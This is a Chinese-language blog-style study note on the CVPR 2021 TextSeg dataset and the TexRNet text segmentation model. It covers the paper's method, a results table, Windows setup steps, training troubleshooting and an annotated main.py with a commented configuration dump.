    'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // 分类器的路径
    'COMMENT': '>>>>later<<<<', // 训练过程中的注释信息
    'DISPLAY': 10, // 每隔多少次迭代输出一次日志信息
    'LOSS_WEIGHT': {'losscls': 0.1, // 不同损失函数的权重
    'lossrfn': 0.5,
    'lossrfntri': 0.5,
    'losssem': 1},
    'LOSS_WEIGHT_NORMALIZED': False, // 是否使用归一化的损失权重
    'LR_BASE': 0.01, // 学习率的基础值
    'LR_ITER_BY': 'iter', // 学习率的迭代方式。此处为'iter',表示按照迭代次数更新学习率
    'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // 学习率的更新方式。包含了两种类型:'linear'和'ploy'
    'MAX_STEP': 20500, // 最大迭代次数或 epoch 数
    'MAX_STEP_TYPE': 'iter', // 最大迭代次数或 epoch 数的类型。此处为'iter',表示按照迭代次数来计算。
    'OPTIMIZER': 'sgd', // 优化器的类型。此处为'sgd',表示随机梯度下降法
    'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // 不同模型在优化器中学习率的比例。包含了'texrnet'和'hrnet'两个键,分别对应不同模型
    'OVERFIT_A_BATCH': False, // 是否以一个 batch 进行过拟合实验
    'ROI_ALIGN_SIZE': [32, 32], // 表示 Region of Interest (ROI) Align 的大小
    'ROI_BBOX_PADDING_TYPE': 'semcrop', // 表示 ROI Align 时的填充类型
    'SAVE_CODE': True, // 是否保存代码
    'SAVE_INIT_MODEL': True, // 是否保存初始化模型
    'SGD_MOMENTUM': 0.9, // SGD 优化器的动量
    'SGD_WEIGHT_DECAY': 0.0005, // SGD 优化器的权重衰减因子
    'SIGNATURE': ['texrnet', 'hrnet'], // 模型签名
    'SKIP_PARTIAL': True, // 是否跳过部分数据
    'UPDATE_CLASSIFIER': False, // 是否更新分类器参数
    'USE_OPTIM_MANAGER': True, // 是否使用优化器管理器
    'VISUAL': False}} // 是否可视化
    ]]>
    + 资源

    笔记

    文本分割(text segmentation)是很多任务的先决条件!如文本样式迁移(text style transfer)场景文本移除(scene text removal)

    TextSeg

    最近一次公共文本分割挑战在 2013-2015 年,由 ICDAR 主办。只有数据集:

    • Total Text
    • COCO TS
    • MLT_S

    都只有场景文本,没有艺术设计文本。

    目前数据集太少了啊啊啊啊!但是我们提出了一种新的数据集 TextSeg

    • 4024 张图像

      • 2646 训练集
      • 340 验证集
      • 1038 测试集
    • 具有六种类型的注释:

      • 单词 word

      • 字符 character

      • 边界多边形 bounding polygons

      • 蒙版 masks

      • 转录 transcriptions

      • 阴影、3D、光晕等也进行了注释

    • 先进之处:

      • 来自不同来源,样式更多
      • 注释更全面
      • accurate masks 更准确

    TexRNet

    早期都是用阈值法进行分割,对复杂颜色和纹理的场景文本图像就 GG。深度学习方法:SMANet。

    提出了一种新的文本分割网络:TexRNet

    png

    • 适应了文本的独特特性,如非凸边界、不同纹理等。
    • DeeplabV3+ 或 HRNet
      • ResNet101-DeeplabV3+ 和 HRNetV-W48 是语义分割领域的里程碑和最先进的作品
    • 有效的网络模块:关键特征池(key features pooling)基于注意力的相似性检查(attention-based similarity checking)
      • 关键特征池:使用余弦相似性学习文本纹理
      • 基于注意力的相似性检查,使用一个注意力层,用 $v$ 作为关键字,$x_f$ 作为查询,并通过点积和 softmax 来计算查询关键字的相似性 $x_{att}$:$x_{att}=\mathrm{Softmax}(v^T\cdot x_f),x_{att}\in \mathbb{R}^{c\times n}$
    • 引入了**三映射(trimap loss)鉴别器(glyph discriminator)**损失
      • 关注边界的损失函数将进一步提高文本的精度

        • $\mathcal L_{tri}=\mathrm{WCE}(x_{rfn},x_{gt},w_{tri})\\mathrm{WCE}(x,y,m)=-\frac{\summ_{j=1}w_j\sumc_{j=1}x_{i,j}\log(y_{i,j})}{\sum^n_{j=1}w_j}$
          • $w_{tri}$ 是文本边界上值为 1、其他地方为 0 的二进制映射
          • $\mathrm{WCE}(x,y,w)$ 是由空间映射 $w$ 加权的 $x$ 和 $y$ 之间的交叉熵
      • 预训练用于字符识别的分类器,有 37 个类,包含 26 个字母,10 个数字和 misc

      • 最终损失函数:$\mathcal L = \mathcal L_{sem} +\alpha\mathcal L_{rfn} +\beta\mathcal L_{tri} +\gamma\mathcal L_{dis}$


    实验结果:

    MethodTextSeg(Ours)ICDAR13 FSTCOCO_TSMLT_STotal-Text
    指标fgIoU/F-scorefgIoU/F-scorefgIoU/F-scorefgIoU/F-scorefgIoU/F-score
    DeeplabV3+84.07/0.91469.27/0.80272.07/0.64184.63/0.83774.44/0.824
    HRNetV2-W4885.03/0.91470.98/0.82268.93/0.62983.26/0.83675.29/0.825
    HRNetV2-W48 + OCR85.98/0.91872.45/0.83069.54/0.62783.49/0.83876.23/0.832
    Ours: TexRNet + DeeplabV3+86.06/0.92172.16/0.83573.98/0.72286.31/0.83076.53/0.844
    Ours: TexRNet + HRNetV2-W4886.84/0.92473.38/0.85072.39/0.72086.09/0.86578.47/0.848

    代码

    TextSeg

    我们的数据集(TextSeg)仅供学术界使用,不能用于任何商业项目和研究。要下载数据,请向 textseg.dataset@gmail.com 发送请求电子邮件,并告诉我们您隶属于哪所学校。

    但是网上居然还是能找到下载地址……:TextSeg 大规模文本检测及分割数据集 - 数据集下载 - 超神经 (hyper.ai)


    png

    • image.tar.gz包含 4024 张图像。

    • annotation.tar.gz

      与图像对应的标签。包括以下三种类型的文件:

      • [dataID]_anno.json 包含所有单词和字符级别的翻译以及边界多边形。
      • [dataID]_mask.png 包含所有字符掩码。字符掩码标签值将从 1 到 n 排序。标签值 0 表示背景,255 表示忽略。
      • [dataID]_maskeff.png 包含所有具有效果的字符掩码。
      • Adobe_Research_License_TextSeg.txt 许可证文件。
    • semantic_label.tar.gz

      包含所有字级(语义级)掩码。它包含:

      • [dataID]_maskfg.png 0 表示背景,100 表示单词,200 表示单词效果,255 表示忽略。(也可以使用[dataID]_maskfg.png[dataID]_mask.png[dataID]_maskeff.png)
    • split.json 训练集,验证集和测试集的官方拆分。

    • [可选]我们论文中使用的旧版本标签。可以下载它以复制我们的论文结果。semantic_label_v1.tar.gz

    TexRNet

    有两种 Backbone,效果各有千秋?

    • HENetV-W48
    • DeeplabV3+

    TexRNet - Google Drive 下载相应内容:

    • 测试:texrnet_hrnet.pthtexrnet_deeplab.pth

    • 训练:init/*

    配置

    1. 新建一个 conda 环境:
    1
    conda create -n texrnet python=3.7
    1
    conda activate texrnet
    1. 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了 orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision
    • torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl
    • torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl

    不知道为什么今天 edge 下载得特别慢,用迅雷了。

    png

    1
    pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    1
    pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    png

    1. 拉取仓库:SHI-Labs/Rethinking-Text-Segmentation: [CVPR 2021] Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach (github.com)

    2. 在仓库目录下,将 requirement.txt 里的 torch==1.6torchvision==0.7 删掉,然后执行:

    1
    pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
    1. 在仓库目录下,新建好下列文件夹:
    • pretrained
      • pretrained/init
    • data
    • log

    png

    1. 放置数据库在 data/TextSeg 中:

    png

    测试

    1. 先改代码!Windows 下踩坑:Pytorch 报错解决——(亲测有效)RuntimeError: Distributed package doesn‘t have NCCL built in_康康好老啊的博客-CSDN 博客。pycharm 中 ctrl+shift+r 将所有 nccl 替换为 gloo

    2. 设置参数:--eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    png

    1. 能跑,GPU 风扇疯狂转,吓得我赶紧停了😅。还是用服务器吧呜呜呜……

    png

    训练

    1. 设置参数:--hrnet --gpu 0 --dsname textseg --trainwithcls

    png

    1. 踩坑,在 data\TextSeg 中,把 annotation 文件夹名称修改为 bpoly_label

    png

    1. 应该能 train 吧,显示显存不够是真的牛逼😅。还是用服务器吧呜呜呜……(是不是调成 gloo 的问题?该好好学 linux 了呜呜呜)

    png

    我说婷婷!在 train_utils.py 里把 cfg.DATA.NUM_WORKERS_PER_GPU 调小就又可以跑了!

    1
    2
    3
    4
    5
    6
    if not cfg.DEBUG:
    cfg.DATA.NUM_WORKERS_PER_GPU = 2
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
    cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
    'hrnet':1, 'texrnet': 10}
    return cfg

    好吧还是跑不了,giao! File “D:\Study\XXXXX\Rethinking-Text-Segmentation\lib\torchutils.py”, line 262, in _call_
    return y
    UnboundLocalError: local variable ‘y’ referenced before assignment

    阅读

    感觉这个仓库的代码写的很隐秘……一层又一层的。

    main.py

    --eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    表示:

    • 开启 eval 模式
    • 预训练模型路径:pretrained/texrnet_hrnet.pth
    • 使用 HRNet 模型
    • 使用 0 号 GPU
    • 数据集:textseg

    设置 parser 参数:

    nametypedefaulthelp
    –debugboolFalse是否启动 debug 模式
    –hrnetboolFalse是否使用 HRNet 模型
    –evalboolFalse是否开启 eval 模式
    –pthstr保存的权重文件路径,即预训练模型的路径
    –gpu使用哪些 GPU
    –portint11233分布式处理的端口号
    –dsnamestr‘textseg’数据集名称,可选:‘textseg’、‘cocots’、‘mlt’、‘icdar13’、‘totaltext’
    –trainwithclsboolFalse是否使用分类器来训练

    istrain = not args.eval,如果不开启 eval 模式,那就是开启 train 模式。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    # 设置训练模式
    if istrain:
    cfg = copy.deepcopy(cfg_train)
    else:
    cfg = copy.deepcopy(cfg_test)

    if istrain:
    # 运行在训练模式下,则调用 get_experiment_id()函数获取一个新的实验 ID,并将其赋值给 cfg.EXPERIMENT_ID。
    # 每次运行程序时,都会产生一个新的实验 ID,以便在训练多个模型时能够区分它们之间的差异
    cfg.EXPERIMENT_ID = get_experiment_id()
    else:
    # 表示当前不处于任何实验中
    cfg.EXPERIMENT_ID = None

    # 设置数据集
    if args.dsname == "textseg":
    cfg_data = cfg_textseg
    elif args.dsname == "cocots":
    cfg_data = cfg_cocots
    elif args.dsname == "mlt":
    cfg_data = cfg_mlt
    elif args.dsname == "icdar13":
    cfg_data = cfg_icdar13
    elif args.dsname == "totaltext":
    cfg_data = cfg_totaltext
    else:
    raise ValueError

    cfg.DEBUG = args.debug
    cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
    if args.gpu is None:
    # 如果不设置 GPU,就都用了
    cfg.GPU_DEVICE = 'all'
    else:
    # 使用指定的 GPU
    cfg.GPU_DEVICE = args.gpu

    # 加载模型和数据
    cfg.MODEL = copy.deepcopy(cfg_mdel)
    cfg.DATA = copy.deepcopy(cfg_data)

    if istrain:
    cfg = set_cfg_train(cfg, dsname=args.dsname)
    if args.hrnet:
    # 调用 set_cfg_hrnetw48_train 函数对 HRNet-W48 模型进行配置
    cfg = set_cfg_hrnetw48_train(cfg)
    else:
    cfg = set_cfg_eval(cfg, dsname=args.dsname)
    if args.hrnet:
    cfg = set_cfg_hrnetw48_eval(cfg)
    # 加载预训练模型
    cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

    # 设置数据集模式
    if istrain:
    if args.dsname == "textseg":
    cfg.DATA.DATASET_MODE = 'train+val'
    elif args.dsname == "cocots":
    cfg.DATA.DATASET_MODE = 'train'
    elif args.dsname == "mlt":
    cfg.DATA.DATASET_MODE = 'trainseg'
    elif args.dsname == "icdar13":
    cfg.DATA.DATASET_MODE = 'train_fst'
    elif args.dsname == "totaltext":
    cfg.DATA.DATASET_MODE = 'train'
    else:
    raise ValueError
    else:
    if args.dsname == "textseg":
    cfg.DATA.DATASET_MODE = 'test'
    elif args.dsname == "cocots":
    cfg.DATA.DATASET_MODE = 'val'
    elif args.dsname == "mlt":
    cfg.DATA.DATASET_MODE = 'valseg'
    elif args.dsname == "icdar13":
    cfg.DATA.DATASET_MODE = 'test_fst'
    elif args.dsname == "totaltext":
    cfg.DATA.DATASET_MODE = 'test'
    else:
    raise ValueError

    if istrain:
    if args.trainwithcls: # 启动分布式训练
    if args.dsname == 'textseg': # 数据集
    cfg.DATA.LOADER_PIPELINE = [
    'NumpyImageLoader', # 使用 numpy 模块读取图像数据
    'TextSeg_SeglabelLoader', # 加载文本区域分割标签数据
    'CharBboxSpLoader',] # 加载字符边界框数据。这些数据都是用于文本检测或分割任务的
    cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32] # 随机裁剪的尺寸
    cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2] # 缩放比例
    cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3] # 宽高比范围
    cfg.DATA.TRANS_PIPELINE = [
    'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
    'TextSeg_RandomResizeCropCharBbox', # 对文本区域分割标签和字符边界框等数据进行随机尺度变换和裁剪操作,以增强模型鲁棒性
    'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
    'Normalize', # 进行零均值和单位方差的标准化处理
    'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
    'RandomCrop', # 对图像数据进行随机裁剪操作
    ]
    elif args.dsname == 'icdar13':
    cfg.DATA.LOADER_PIPELINE = [
    'NumpyImageLoader', # 使用 numpy 模块读取图像数据
    'SeglabelLoader', # 加载文本区域分割标签数据
    'CharBboxSpLoader',] # 加载字符边界框数据
    cfg.DATA.TRANS_PIPELINE = [
    'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
    'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
    'Normalize', # 进行零均值和单位方差的标准化处理
    'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
    'RandomCrop', # 对图像数据进行随机裁剪操作
    ]
    else:
    raise ValueError
    # 将文本数据格式化为文本区域和字符边界框标签,以便进行检测和识别任务的训练
    cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
    # 用于将字符边界框转化成方形,以方便进行 RoI 池化
    cfg.DATA.LOADER_SQUARE_BBOX = True
    # 表示随机裁剪操作从哪个阶段开始,这里设为'sem'即从语义分割的阶段开始
    cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
    # 表示网络在训练过程中从哪个阶段进行预测得到输出结果,这里设为'sem'也是从语义分割的阶段开始
    cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
    # the one with 93.98% and trained on semantic crops
    # 分类器的预训练模型路径
    cfg.TRAIN.CLASSIFIER_PATH = osp.join(
    'pretrained', 'init', 'resnet50_textcls.pth',
    )
    # RoI 池化时边界框的扩充方式,这里采用 semcrop
    cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
    # RoI 池化后的图像大小
    cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
    # 是否对分类器进行更新
    cfg.TRAIN.UPDATE_CLASSIFIER = False
    # 在训练过程中从语义分割的阶段开始多少次迭代后激活分类器的训练
    cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
    # 各个损失函数的权重,包括语义分割的损失、RFN 的损失、RFNtri 的损失和分类器的损失
    cfg.TRAIN.LOSS_WEIGHT = {
    'losssem' : 1,
    'lossrfn' : 0.5,
    'lossrfntri': 0.5,
    'losscls' : 0.1,
    }

    if istrain:
    # 是否采用 HRNet 作为语义分割网络模型,如果不采用,就用 deeplab
    if args.hrnet:
    cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
    else:
    cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
    # 'LOG_DIR':日志文件所在目录,如果是训练模式则创建一个新的实验文件夹,并将日志文件保存在该目录下的'train.log'中
    cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
    else:
    # 如果是评估模式则将日志文件保存在'eval.log'中
    cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
    cfg.TEST.SUB_DIR = None

    if cfg.DEBUG:
    # 如果开启了调试模式,则将实验 ID 设置为 999999999999,方便跟踪调试结果
    cfg.EXPERIMENT_ID = 999999999999
    # 每个 GPU 使用的数据加载器线程数
    cfg.DATA.NUM_WORKERS_PER_GPU = 0
    # 每个 GPU 使用的 batch size 大小
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

    cfg = common_initiates(cfg) # 该函数用于加载训练和测试数据,并进行数据预处理、标准化等操作

    if istrain:
    if args.trainwithcls:
    # 执行训练操作的时间戳。如果使用分类器,则调用 ts_with_classifier()函数进行时间戳设置
    exec_ts = ts_with_classifier()
    else:
    # 调用 ts()函数进行时间戳设置
    exec_ts = ts()
    # 训练器对象
    trainer = train(cfg)
    # 向训练器对象注册不同的训练阶段,包括数据加载、前向传播、反向传播、参数更新等流程
    trainer.register_stage(exec_ts)

    # trainer(0)
    # 使用多进程方式进行训练,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速训练过程。
    # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
    mp.spawn(trainer,
    args=(),
    nprocs=cfg.GPU_COUNT,
    join=True)
    else:
    # 执行测试操作的时间戳
    exec_es = es()
    # 测试器对象
    tester = eval(cfg)
    # 向测试器对象注册不同的测试阶段,包括数据加载、前向传播、评估等流程
    tester.register_stage(exec_es)

    # tester(0)
    # 使用多进程方式进行测试,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速测试过程。
    # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
    mp.spawn(tester,
    args=(),
    nprocs=cfg.GPU_COUNT,
    join=True)

    开跑时,会显示各种参数的情况:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    {'COMPUTER_NAME': 'OMEN',  // 电脑名称
    'CUDA': True, // CUDA 是否可用
    'DATA': {'ALIGN_CORNERS': True, // 是否对齐图像的四个角
    'CLASS_NAME': ['background', 'text'], // 类别名称。在本例中,有两类分别为'background'和'text'
    'CLASS_NUM': 2, // 类别数量
    'DATASET_MODE': 'train+val', // 数据集模式。在本例中,是训练数据集和验证数据集结合在一起使用
    'DATASET_NAME': 'textseg', // 数据集名称,在本例中为'textseg'
    'EFFECTIVE_CLASS_NUM': 2, // 有效的类别数量
    'FORMATTER': 'SemChinsChbbxFormatter', // 数据格式化器的名称,在本例中为'SemChinsChbbxFormatter'
    'IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
    'IM_MEAN': [0.485, 0.456, 0.406], // 图像各个通道的均值
    'IM_STD': [0.229, 0.224, 0.225], // 图像各个通道的标准差
    'LOADER_DERIVED_CLS_MAP_TO': 'bg', // 加载程序映射的类名
    'LOADER_PIPELINE': ['NumpyImageLoader', // 加载数据的处理流程
    'TextSeg_SeglabelLoader',
    'CharBboxSpLoader'],
    'LOADER_SQUARE_BBOX': True, // 是否在加载时将字符的 bbox 转换为正方形
    'LOAD_BACKEND_IMAGE': 'pil', // 读取图像的库名称
    'LOAD_IS_MC_IMAGE': False, // 是否是多通道图像
    'LOAD_IS_MC_SEGLABEL': True, // 加载的标签是否是多通道的
    'NUM_WORKERS': 5, // 加载数据的线程数
    'NUM_WORKERS_PER_GPU': 5, // 每个 GPU 上加载数据的线程数
    'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // 对图像进行随机 crop 时需要填充的内容
    'RANDOM_CROP_PADDING_MODE': 'random', // 填充模式,在本例中为'random'
    'RANDOM_CROP_SIZE': [513, 513], // 进行随机 crop 时输出的尺寸大小
    'RANDOM_RESIZE_CROP_FROM': 'sem', // 将 semantic label resize 到指定大小后再进行随机 crop
    'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // 进行 resize 时的纵横比范围
    'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // 进行 resize 时的缩放比例范围
    'RANDOM_RESIZE_CROP_SIZE': [32, 32], // 在进行 resize 前需要保证 semantic label 的最小尺寸大小
    'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // 是否对齐图像的四个角
    'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // 进行缩放的维度,在本例中为长边
    'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // 进行缩放时的尺寸范围
    'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // 数据集所在目录
    'SEGLABEL_IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
    'SEMANTIC_PICK_CLASS': 'all', // 要选择的语义类别,在本例中为'all'
    'TRANS_PIPELINE': ['UniformNumpyType', // 图像的预处理流程
    'TextSeg_RandomResizeCropCharBbox',
    'NormalizeUint8ToZeroOne',
    'Normalize',
    'RandomScaleOneSide',
    'RandomCrop'],
    'TRY_SAMPLE': None}, // 尝试样本的数量
    'DEBUG': False, // 是否开启调试模式
    'DIST_BACKEND': 'gloo', // 分布式训练的后端,本例中为'gloo'
    'DIST_URL': 'tcp://127.0.0.1:11233', // 分布式训练的 URL
    'EXPERIMENT_ID': 168471973979, // 实验的 ID
    'GPU_COUNT': 1, // 使用的 GPU 数量
    'GPU_DEVICE': [0], // 使用的 GPU 编号
    'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // 日志存储的目录路径
    'LOG_FILE': 'D:\\Study\\XXXX\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // 日志输出的文件路径
    'MAINLOOP_EXECUTE': True, // 是否执行主循环
    'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // 主要的代码文件
    'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // 代码所在的路径
    'MATPLOTLIB_MODE': 'Agg', // Matplotlib 模式
    'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // 杂项文件的存储目录路径
    // 模型的配置文件,包含了 HRNet 模型的距离参数和结构
    'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
    'BN_MOMENTUM': 'hardcoded to 0.1', // Batch Normalization 层的动量
    'FINAL_CONV_KERNEL': 1, // 最终卷积核的大小
    'IGNORE_LABEL': 999, // 忽略标签的数值
    'INTRAIN_GETPRED': False, // 是否在训练时计算预测结果
    'LOSS_TYPE': 'ce', // 使用的损失函数类型
    'MODEL_TAGS': ['v0', 'base'], // 模型标签
    'OUTPUT_CHANNEL_NUM': 720, // 模型输出通道数
    'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // 预训练模型的路径
    'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // HRNet 中所使用的块的类型
    'FUSE_METHOD': 'SUM', // HRNet 的每个分支上进行特征融合的方法
    'NUM_BLOCKS': [4], // 每个分支中块的数量
    'NUM_BRANCHES': 1, // 使用的分支数
    'NUM_CHANNELS': [64], // 每个分支的通道数
    'NUM_MODULES': 1}, // 使用的模块数
    'STAGE2_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4],
    'NUM_BRANCHES': 2,
    'NUM_CHANNELS': [48, 96],
    'NUM_MODULES': 1},
    'STAGE3_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4],
    'NUM_BRANCHES': 3,
    'NUM_CHANNELS': [48, 96, 192],
    'NUM_MODULES': 4},
    'STAGE4_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4, 4],
    'NUM_BRANCHES': 4,
    'NUM_CHANNELS': [48, 96, 192, 384],
    'NUM_MODULES': 3}},
    'MODEL_NAME': 'texrnet', // 模型名称
    'TEXRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
    'BIAS_ATTENTION_TYPE': 'cossim', // 偏置注意力的类型
    'BN_TYPE': 'bn', // Batch Normalization 层的类型
    'CONV_TYPE': 'conv', // 卷积层的类型
    'INIT_BIAS_ATTENTION_WITH': None, // 哪个注意力层进行初始化偏置注意力
    'INPUT_CHANNEL_NUM': 720, // 输入 Tensor 的通道数
    'INTRAIN_GETPRED_FROM': 'sem', // 在训练时计算预测结果的来源。此处为'sem',表示来自语义分割
    'MODEL_TAGS': ['hrnet'], // 模型标签
    'PRETRAINED_PTH': None, // 预训练模型的路径
    'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // 精细化模块中各层输出通道数
    'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // 精细化模块中各损失函数类型
    'lossrfntri': 'trimapce'},
    'RELU_TYPE': 'relu', // ReLU 激活函数的类型
    'SEMANTIC_CLASS_NUM': 2, // 语义分割的类别数
    'SEMANTIC_IGNORE_LABEL': 999, // 语义分割中被忽略的标签
    'SEMANTIC_LOSS_TYPE': 'ce'}}, // 语义分割中使用的损失函数类型
    'RND_RECORDING': False, // 是否记录随机数生成器的状态
    'RND_SEED': 2, // 随机数种子
    'SAVE_CODE': True, // 是否保存代码
    'TORCH_VERSION': '1.13.1+cu117', // 使用的 PyTorch 版本号
    'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // 在第几次迭代后为分割模型激活分类器
    'ACTIVATE_REFINEMENT_AT_ITER': 0, // 在第几次迭代后激活精细化模块
    'BATCH_SIZE': 5, // 每个 GPU 上的 batch 大小
    'BATCH_SIZE_PER_GPU': 5,
    'CKPT_EVERY': inf, // 每多少 epoch 保存一次模型权重
    'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // 分类器的路径
    'COMMENT': '>>>>later<<<<', // 训练过程中的注释信息
    'DISPLAY': 10, // 每隔多少次迭代输出一次日志信息
    'LOSS_WEIGHT': {'losscls': 0.1, // 不同损失函数的权重
    'lossrfn': 0.5,
    'lossrfntri': 0.5,
    'losssem': 1},
    'LOSS_WEIGHT_NORMALIZED': False, // 是否使用归一化的损失权重
    'LR_BASE': 0.01, // 学习率的基础值
    'LR_ITER_BY': 'iter', // 学习率的迭代方式。此处为'iter',表示按照迭代次数更新学习率
    'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // 学习率的更新方式。包含了两种类型:'linear'和'ploy'
    'MAX_STEP': 20500, // 最大迭代次数或 epoch 数
    'MAX_STEP_TYPE': 'iter', // 最大迭代次数或 epoch 数的类型。此处为'iter',表示按照迭代次数来计算。
    'OPTIMIZER': 'sgd', // 优化器的类型。此处为'sgd',表示随机梯度下降法
    'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // 不同模型在优化器中学习率的比例。包含了'texrnet'和'hrnet'两个键,分别对应不同模型
    'OVERFIT_A_BATCH': False, // 是否以一个 batch 进行过拟合实验
    'ROI_ALIGN_SIZE': [32, 32], // 表示 Region of Interest (ROI) Align 的大小
    'ROI_BBOX_PADDING_TYPE': 'semcrop', // 表示 ROI Align 时的填充类型
